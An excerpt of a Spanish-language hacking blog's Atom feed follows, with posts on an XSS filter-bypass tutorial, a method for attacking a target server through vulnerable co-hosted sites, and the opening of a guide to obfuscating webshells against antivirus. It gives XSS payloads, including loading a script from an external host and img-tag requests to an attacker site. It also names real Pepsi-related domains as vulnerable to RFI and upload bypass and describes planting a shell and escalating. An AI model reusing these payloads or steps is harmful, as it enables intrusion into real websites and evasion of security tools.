href="http://1.bp.blogspot.com/-4-a3_y5T-g0/TeWqDHqJsUI/AAAAAAAAAB4/yJc3fbgLNgk/s1600/2011-05-31_21-52-38.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="40" width="203" src="http://1.bp.blogspot.com/-4-a3_y5T-g0/TeWqDHqJsUI/AAAAAAAAAB4/yJc3fbgLNgk/s320/2011-05-31_21-52-38.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;style type="text/css"&gt;&lt;br /&gt;#bordeytamaño{&lt;br /&gt;   border: 1px solid gray;&lt;br /&gt;   width: 200px;&lt;br /&gt;}&lt;br /&gt;#barraup{&lt;br /&gt;   background-color: #660000;&lt;br /&gt;   font-weight: bold;&lt;br /&gt;   font-size: 8pt;&lt;br /&gt;   padding: 4 4 4 4px;&lt;br /&gt;}&lt;br /&gt;#siguemetwitter{&lt;br /&gt;   font-size: 8pt;&lt;br /&gt;   padding: 6 6 6 6px;&lt;br /&gt;   background-color: black;&lt;br /&gt;}&lt;br /&gt;&lt;/style&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div id=bordeytamaño&gt;&lt;div id=barraup&gt;Sigueme en Twitter&lt;br /&gt;   &lt;/div&gt;&lt;div id=siguemetwitter&gt;AQUI VA EL CODE DE SU BOTTON GENERADO POR TWITTER&lt;br /&gt;   &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1439652072521755958?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1439652072521755958/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/un-pequeno-follow-me-elegante.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1439652072521755958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1439652072521755958'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/un-pequeno-follow-me-elegante.html' title='Un pequeño &quot;Follow Me&quot; Elegante'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-yWJmLXkN_fA/TeWqAPp4KEI/AAAAAAAAABw/cHJOsmZEdjo/s72-c/2011-05-31_21-51-44.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-7209544106249555499</id><published>2011-05-30T17:13:00.000-07:00</published><updated>2011-08-24T11:17:11.306-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades'/><title type='text'>[XSS] Bypassing De Filtros by Vengador de las Sombras</title><content type='html'>Tema profundizado: &lt;a href="http://0verl0ad.blogspot.com/2008/09/xss-bypassing-de-filtros.html"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Primero definamos qué es el bypassing. El bypassing, para cualquier cosa, consiste en poder atravesar alguna medida de seguridad con un objetivo. En nuestro caso, la definición se amolda a "saltar un filtro". El primer tipo de filtro va a ser en los formularios en los cuales sólo te dejan escribir un número determinado de caracteres.&lt;br /&gt;&lt;br /&gt;En los inputs, se puede colocar un parámetro el cual defina el máximo número de caracteres que se pueden escribir dentro del input, se trata de maxlength="numero". Si encontrásemos un input al estilo de:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;input maxlength="5" name="input" type="text" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;No podríamos escribir nada interesante, puesto que únicamente tenemos espacio para escribir 5 letras.... Entonces si pensamos un poco, recordaremos cierta técnica enfocada a modificar un formulario antes de enviarse.... Sí, exacto: es hora de practicar &lt;b&gt;form tampering&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Simplemente debemos de abrir alguna tool que nos permita modificar el código fuente, vamos al formulario en cuestión, y modificamos el maxlength por un número altísimo, por ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;input maxlength="99999999999999999" name="input" type="text" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Ahora si probamos a escribir en nuestro campo, observaremos que ya sí podemos inyectar código malicioso.&lt;br /&gt;&lt;br /&gt;Otro filtro muy común son las magic quotes. Este filtro se ocupa de adherir una \ a las comillas que pongamos en nuestro código malicioso. Así si intentamos poner algo, "en teoría" modificaría nuestra sentencia haciéndola inservible... Pero sólo en teoría.&lt;br /&gt;&lt;br /&gt;El primer consejo que os doy para saltar un filtro, es ver qué bloquea, y despues buscar la forma de no hacer eso que bloquea. Es decir, si no te deja poner comillas, no luches contra ello, evítalo y busca la forma de inyectar sin usar comillas. Un ejemplo sería meter el código malicioso en un .js alojado en un servidor externo, y entonces al hacer la inyección, la hacemos sin comillas:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;script src="Http://host.com/FoS.js"&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Ya tendríamos nuestra bonito XSS explotado. Pero no siempre todo es tan fácil. Las magic quotes también pueden hacer el efecto contrario: que te impidan poner /, ya que le adhieren unas comillas. Estaríamos ante el mismo problema que antes... o incluso peor, puesto que se nos impide cerrar cualquier tipo de tag, ya que recordemos, en HTML es necesario cerrar los tags con /.&lt;br /&gt;&lt;br /&gt;Bien, no os asusteis, recordad mi consejo: No lucheis, evitad. Pues eso, evitemos tener que cerrar tags. Tenemos que realizar una búsqueda mental de elementos que no necesiten ser cerrados. Elementos como tales no encontraremos, pero..¿ y si os dijera que se puede meter código javascript dentro de un tag ?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sip, así es. La idea original sería la de ejecutar algún evento "on" asociado a unas sentencias en JavaScript. En nuestro caso, y como ya espuse en otro paper, vamos a proceder a crear un error, y que al producirse el error tenga como respuesta la ejecución de JavaScript. Este elemento "on" es onerror. Tendríamos que poner simplemente &lt;br /&gt;&lt;pre class="brush :html"&gt;onerror=Código Javascript&lt;/pre&gt;.&lt;br /&gt;&lt;br /&gt;Para producir el error vamos a poner un con una ruta ficticia. Al no poder visualizar la imagen, saltará el consecuente error que ejecutará el código malicioso. Lo que traducido sería:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img )="" onerror="Alert(/FoS" src="." team="" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;La cosa se puede poner más peliaguda aún, si lo que hace el filtro es impedir meter letras a la variable. Me refiero a ciertos filtros que te permiten ejecutar JavaScript, pero que dentro de la sentencia en sí no te dejan usar letras ni caracteres especiales. Para estos casos, podemos transformar nuestro código malicioso en los valores ASCII de los caracteres que lo componen, y despues incrustarlos a través de String.fromCha rCode(codigo ascii).&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Esto provocaría una ventanita de alert con el texto "XSS". Otra forma de saltar estos filtros es poniendo código malicioso en UNICODE, es decir, representando cada caracter con su valor Hexadecimal y añadiéndole a cada uno un % delante.&lt;br /&gt;&lt;br /&gt;Y ya por último, otro filtro que sí que nos pone las cosas bien jodidas, la función Strip_Tags . Esta función se encarga de eliminar de una variable todo lo que esté entre &amp;lt; &amp;gt;. Ahora sí que la cosa está dificil, ¿eh?. ¿Qué os tengo dicho? No intentar atravesar, siempre evitar. Y eso haremos.&lt;br /&gt;&lt;br /&gt;Que no podemos poner &amp;lt; &amp;gt;, pues no lo ponemos. Si recordamos a los XSS en formularios, para saltarlos había que cerrar Value y a partir de ahí inyectar... Pues ahora vamos a realizar una variante de esta técnica. Si sabemos algo de CSS, podemos recordar que se pueden poner URL en algunos elementos... Entonces si a nuestro input le hacemos esto:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;input name="input" style="background: url(url con codigo malicioso);" type="text" value="" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Habremos conseguido inquistar una sentencia maligna dentro del tag propio de la página.&lt;br /&gt;&lt;br /&gt;En muchos blogs te permiten usar ciertos tags permitidos, como o&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;li&gt;&lt;/li&gt;&lt;br /&gt;&lt;/pre&gt;y esas cosas. Ahí igualmente se podría inyectar el código malicioso al meter un &lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;b onload="codigo"&gt;&lt;/b&gt;&lt;/pre&gt;. La función Strip_tags no te deja poner tus propios tags, pero sí que te deja poner los que el webmaster haya puesto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Importancia de la etiqueta IMG en la seguridad de un WebSite&lt;br /&gt;&lt;br /&gt;En este pequeño artículo trataremos como dice el titulo "Importancia de la etiqueta &lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;en la seguridad de un WebSite". Como hemos visto las etiquetas &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;son muy usadas en WebsSites ya sean foros o redes sociales o cualquier WebSite que permita la interacion de usuarios. Ya sea en redes sociales que no permiten comentar fotos o perfiles de miembros o foros que nos permitan responder post de otros miembros o cualquier otro tipo en la mayoria de sus casos siempre se suele usar la etiqueta &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;para colocar alguna imagen relacionada con lo que uno esta escribiendo o poniendo alguna foto o gif animado que queramos que los demás usuarios vean, es ahí donde esta este bug que por alguna mal filtrado de las etiquetas &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;que en ves de poner algo normal como seria&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img border="0" src="web:%20http://www.webdelatacante/atake.php.com" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;ó&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img border="0" src="web:%20http://%20http://www.webatacada.com/loguot.php" /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;estos nos permirita&lt;br /&gt;que ala hora que la web trate de ejecutar lo que hay dentro de la etiqueta &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;nos ejecute la url modificada que no es una URL que contenga una imagen si no a sido manipulada para ser que nosotros queramos hacer esto nos permiten ejecutar algún tipo de código malicioso o poder hacer algún XSRF estos tipos de código los clasifico en dos tipos uno que usa URLs externas y otro que usas URLs del mismo sitio.&lt;br /&gt;&lt;br /&gt;Ejemplos:&lt;br /&gt;URL Externa&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img border="0" src="web:%20http://www.webdelatacante.com/ataque.php" /&gt;&lt;br /&gt;&lt;/pre&gt;No solo se puede hacer cargar archivos php si no también cualquier tipo de archivos web que&lt;br /&gt;soporte la web del atacante ya queda a imaginas del atacante el código que pueda colocar en estos archivos.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;URL Interna&lt;/i&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;img border="0" src="web:%20http://%20http://www.webatacada.com/loguot.php" /&gt;&lt;br /&gt;&lt;/pre&gt;En este caso estamos usándolo para hacer un XSRF a la web la url puesta dentro la etiqueta &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;puede variar según lo que nosotros queramos que el usuario ejecute en este caso le cerrara la sesión sin que este se de cuenta de que el XSRF se ejecuto.&lt;br /&gt;&lt;br /&gt;Medidas&lt;br /&gt;Es importante tener un bueno filtrado en la etiqueta &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;asiendo que solo nos acepte URL con extinción gif, jpf, bmp, etc.&lt;br /&gt;O desactivar la etiqueta &lt;pre class="brush :html"&gt;&lt;img /&gt;&lt;/pre&gt;y sustituirlo pro un uploas que tengo un buen sistema de filtrado de archivos de imaganes.&lt;b onload="codigo"&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;[Articulo creado con recopilatorios de informacion, el codigo expuesto pueda no ser ejecutado debido a interpretacion de resaltador.]&lt;/i&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-7209544106249555499?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/7209544106249555499/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/xss-bypassing-de-filtros.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/7209544106249555499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/7209544106249555499'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/xss-bypassing-de-filtros.html' title='[XSS] Bypassing De Filtros by Vengador de las Sombras'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3628449178548416073</id><published>2011-05-29T20:25:00.000-07:00</published><updated>2011-05-29T20:39:07.295-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Pentesting'/><title type='text'>Metodos alternativos para Accesar a un servidor</title><content type='html'>Bueno Me eh dado cuenta q Hay casos en el q van a Ingresar a un servidor web  o algo y se disponen a testear De manera Manual...&lt;br /&gt;&lt;br /&gt;&lt;i&gt;SQL&lt;br /&gt;RFI&lt;br /&gt;LFI&lt;br /&gt;BYPASS&lt;br /&gt;DIR&lt;br /&gt;PATH&lt;br /&gt;XSS&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Entre otras Vulnerabilidades mas... Pff No logran nada !Es muy Segura! :/&lt;br /&gt;&lt;br /&gt;Se van al Acunetix, SSS, w3AF, Intellitamper entre otros Scanner mas.. y se dedican a hacerle un Scan Completo haber si le sacan un Exploit.. y Runnearle algo :/ Nada Todo Es Seguro :(&lt;br /&gt;&lt;br /&gt;Pues Bueno Ahora Pensaremos En &lt;font color="violet"&gt;ALTERNATIVAS&lt;/font&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;-SCAN DE PUERTOS Y SERVICIOS Q CORREN&lt;br /&gt;&lt;br /&gt;-RV DNS y SCAN LOCAL A CADA WEB &amp;lt;-- Alguna Web Debe Ser Vulnerable!!&lt;br /&gt;&lt;br /&gt;-RECONOCIMIENTO DE SERVER CORRIDO&lt;br /&gt;&lt;br /&gt;-VULNERABILIDAD EN DEPENDENCIAS&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;b&gt;Primero Usaremos un Scan de Puertos e Identificacion de Servicios&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Nos decidimos a ir Sacarle la Direccion IP&lt;br /&gt;-Puedes usar ShowIP [ADDON FIREFOX] = lo veran en tiempo real y Directo&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i43.tinypic.com/2zjf85t.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i43.tinypic.com/2zjf85t.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Puedes usar Comando PING para sacarlo mediante Consola&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i42.tinypic.com/14b0tg1.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i42.tinypic.com/14b0tg1.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Una Ves Sacada la IP Nos dedicamos a Scannear puertos Con NMAP o NMAP ONLINE&lt;br /&gt;&lt;br /&gt;NMAP LOCAL&lt;br /&gt;&lt;br /&gt;Me baso en el Local para No extenderlo mas..&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;/*nmap 216.52.186.158&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Dicho Comando nos dara PORT STATE SERVICE&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i42.tinypic.com/sfi6h1.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i42.tinypic.com/sfi6h1.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NMAP ONLINE &lt;a href=" http://nmap-online.com/" target="link"&gt;http://nmap-online.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pekeña Muestra del Online&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i41.tinypic.com/k9zv4z.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i41.tinypic.com/k9zv4z.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;De Hay Vamos Sacando Argumentos hasta Sacar un resultado&lt;br /&gt;Como Nos damos Cuenta Solo hay 1 Solo Puerto Abierto! :/&lt;br /&gt;el 80 HTTP Por si Acaso Probaremos Todo..&lt;br /&gt;&lt;br /&gt;Iremos alguna Db-Exploits Y sacaremos algun EXPLOIT para dicho Puerto / Service&lt;br /&gt;&lt;pre class="brush :html"&gt;/*&lt;br /&gt;www.exploit-db.com&lt;br /&gt;www.1337day.com&lt;br /&gt;&lt;/pre&gt;&lt;i&gt;En Port Seleccionamos Nuestro Objetivo [80]&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i40.tinypic.com/eq8c1y.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i40.tinypic.com/eq8c1y.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;b&gt;En ese tiempo cuando existia Milw0rm :( * Nostalgia *&lt;/b&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;UFFF Demasiados Exploits... Bueno hay Queda Nuestra Imaginacion Y LECTURA para saber de q manera los Podemos Usar! y Si Dicha Web Puede Ser Vulnerable&lt;br /&gt;&lt;br /&gt;&lt;b&gt;[ESTE METODO DE EXPLOIT/PORT NOS SIRVE DE ALTERNATIVA]&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ahora A Tratar de entrar Al Server Mediante REV-DNS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Este Metodo para Mi Es uno Muy Eficaz ya q la mayoria de los servidores abarcan varias webs y varios tipos de programacion y Alguna podria ser Vulnerable!&lt;br /&gt;&lt;br /&gt;&lt;i&gt;En que Consiste¿?&lt;/i&gt;&lt;br /&gt;Consiste en Sacar todas las webs Q estan en un mismo servidor ya sea la de PEPSI.. Quiero sacar las webs q estan Junto a ella en Modo server&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Como Ponerlo a Prueba¿?&lt;/i&gt;&lt;br /&gt;Simple usaremos un Servicio WEB o alguna tool que se programen para este objetivo!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://reversedns.undersecurity.net/" target="link"&gt;http://reversedns.undersecurity.net/&lt;/a&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i39.tinypic.com/2w6bhp0.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i39.tinypic.com/2w6bhp0.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Le Damos en ENVIAR y esperamos a Que nos Liste Las webs q Estan en el mismo servidor de PEPSI.com&lt;/u&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i44.tinypic.com/de451w.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i44.tinypic.com/de451w.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Una Ves Cargada la lista Podemos Descargarla en .TXT o verla ON&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bueno Ahora q haremos Con esas Webs ¿?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Simple Son varias web y estoy SEGUROOO!!! q alguna de ellas es Vulnerable a AlgO!!&lt;br /&gt;ya sea XSS SQL etC!  &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Te preguntas que Hare explotando una web en su server si la q quiero es PEPSI.cOM ¿?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Muy Simple No defacearas la web q sea vulnerable Lo q Haras sera Meterle Shell y Escalar Directorios.. la Otra es Rootear El ADMIN GOD para listar todos Sus Webs Alojadas e ingresar a Nuestro Objetivo!!&lt;br /&gt;&lt;br /&gt;No entiendes ¿?&lt;br /&gt;Te doy un Ejemplo!!&lt;br /&gt;Las webs q estan en el mismo server de pepsi son:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;www.pepsi.com&lt;br /&gt;pepsi.com&lt;br /&gt;pepsiusa.com&lt;br /&gt;www.pepsiusa.com&lt;br /&gt;dewgreenlabel.com&lt;br /&gt;www.thereggiebushproject.com  &amp;lt;----VULNERABLE RFI&lt;br /&gt;thereggiebushmix.com&lt;br /&gt;pepsiholidaypacks.com&lt;br /&gt;pepsistreetmotion.com&lt;br /&gt;dietpepsiboxoffice.com&lt;br /&gt;pepsicolastore.com &amp;lt;---------- VULNERABLE A BYPASSER&lt;br /&gt;www.pepsifirsttaste.com&lt;br /&gt;www.pepsibilliondollarchallenge.com&lt;br /&gt;www.billiondollarchallenge.com&lt;br /&gt;mountaindewstore.com&lt;br /&gt;pepsidiet.com&lt;br /&gt;dippedone.com&lt;br /&gt;www.pepsilight.com &lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Una vez testeado todas las webs.. el resultado es q tengo 2 Webs vulnerables&lt;br /&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;Una a RFI&lt;br /&gt;&lt;br /&gt;www.thereggiebushproject.com  &amp;lt;----VULNERABLE RFI&lt;br /&gt;&lt;br /&gt;Otra a BYPASSER DE UPLOADERS&lt;br /&gt;&lt;br /&gt;pepsicolastore.com ;---------- VULNERABLE A BYPASSER&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno lo q Hare es mediante el RFI subir mi Shell&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;|||||||||||||||| 90%&lt;br /&gt;&lt;br /&gt;Cuando Mi Shell este Adentro Nos dedicamos a Escalar Directorios...Hasta llegar al principal..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;www.pepsi.com&lt;br /&gt;www.blabla.com&lt;br /&gt;www.afjasg.com&lt;br /&gt;www.ghafjgasa.org&lt;/pre&gt;&lt;br /&gt;Si logramos llegar Al principal Q Procederemos a Hacer¿?&lt;br /&gt;Ingresar a la Carpeta de Nuestro Objetivo y hacer Lo DESEADO :P&lt;br /&gt;&lt;u&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;Como es lo Comun!!! Es Muy Probable q no puedas Escalar Directorios Para ello Hay q Proceder a ROOTEAR un ADMIN GOD... Eso Se Deja para el Proximo Tuto o Texto!!&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Reconocimiento de Server corrido&lt;/b&gt;&lt;br /&gt;Este metodo Nos sirve para un reconocimiento de server&lt;br /&gt;Lo haremos de Manera Web Sniffer &lt;a href=" http://web-sniffer.net/" target="link"&gt;http://web-sniffer.net/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;Status: HTTP/1.1 200 OK&lt;br /&gt;Date: Sun, 14 Mar 2010 19:20:40 GMT &lt;br /&gt;Server: Apache &lt;br /&gt;Set-Cookie: PHPSESSID=fa1fd3d9039b908d6dd47592cee0e9b6; path=/ &lt;br /&gt;Expires: Thu, 19 Nov 1981 08:52:00 GMT &lt;br /&gt;Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 &lt;br /&gt;Pragma: no-cache &lt;br /&gt;Content-Length: 3541 &lt;br /&gt;Connection: close &lt;br /&gt;Content-Type: text/html&lt;/pre&gt;&lt;br /&gt;Ahora usaremos El metodo de Addons :P&lt;br /&gt;Usaremos Server SPY&lt;br /&gt;Este Addon de Firefox Muestra en la Barra que server corre&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://i42.tinypic.com/33k6uxd.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://i42.tinypic.com/33k6uxd.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Para q Nos sirve El Server¿?&lt;br /&gt;Logico para testear mas a Fondo y saber Sobre exploits y vulnerabilidades q Podamos Runnearles :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;VULNERABILIDAD EN DEPENDENCIAS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Muy poco usado y poco Conocido.. pero sirve en ocasiones&lt;br /&gt;consiste en ver las dependencias de cada web e investigar un poco de ellas y tratar de encontrarle Bugs..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ejemplos:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;flash&lt;br /&gt;&lt;br /&gt;Adobe&lt;br /&gt;&lt;br /&gt;java&lt;br /&gt;&lt;br /&gt;ETC!...&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Como veremos las Dependencias ¿?&lt;br /&gt;Simple! con el Addon VIEW DEPENDENCIES q esta en los addons destacados de Firefox&lt;br /&gt;&lt;br /&gt;Imagen de Web Oficial&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href=" http://mozilla.queze.net/pict/ViewDep0.3.1.png" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src=" http://mozilla.queze.net/pict/ViewDep0.3.1.png" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Una Ves obtenido las Dependencias Se procede a Investigar Y leer sobre ellas&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3628449178548416073?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3628449178548416073/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/metodos-alternativos-para-accesar-un.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3628449178548416073'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3628449178548416073'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/metodos-alternativos-para-accesar-un.html' title='Metodos alternativos para Accesar a un servidor'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i40.tinypic.com/eq8c1y_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-6617452885593619470</id><published>2011-05-29T20:07:00.000-07:00</published><updated>2011-05-29T20:14:20.940-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografia'/><title type='text'>Ofuscando [Sources] Webshell</title><content type='html'>Puesto que la Guia [NO ES MIA] yo tratare de INTERPRETARLA a mi modo ya que la original esta OBSOLETA, para que Puedan usar Shells Indetectables..+ Un salteo de Antivirus.&lt;br /&gt;&lt;br /&gt;Bueno Como Muchos Saben los AVS solo hacen Comparacion de 